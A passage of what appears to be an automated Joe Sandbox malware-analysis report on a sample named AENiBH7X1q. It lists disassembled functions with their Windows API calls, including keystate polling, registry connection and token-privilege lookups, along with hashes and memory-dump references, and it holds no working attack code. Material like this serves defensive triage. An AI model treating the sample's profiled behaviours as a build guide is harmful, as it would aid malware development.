                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 136442275-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00460502
                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4123061591-1241985126
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2483343779-2060113733
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 2
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1331449709-450215437
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                                                                                                                                                                                                                                                                                                                • _memcmp.LIBCMT ref: 004394A9
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                                                                                                                                                                                                                                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1446985595-805462909
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2907320926-41864084
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1932665248-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 004481BA
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
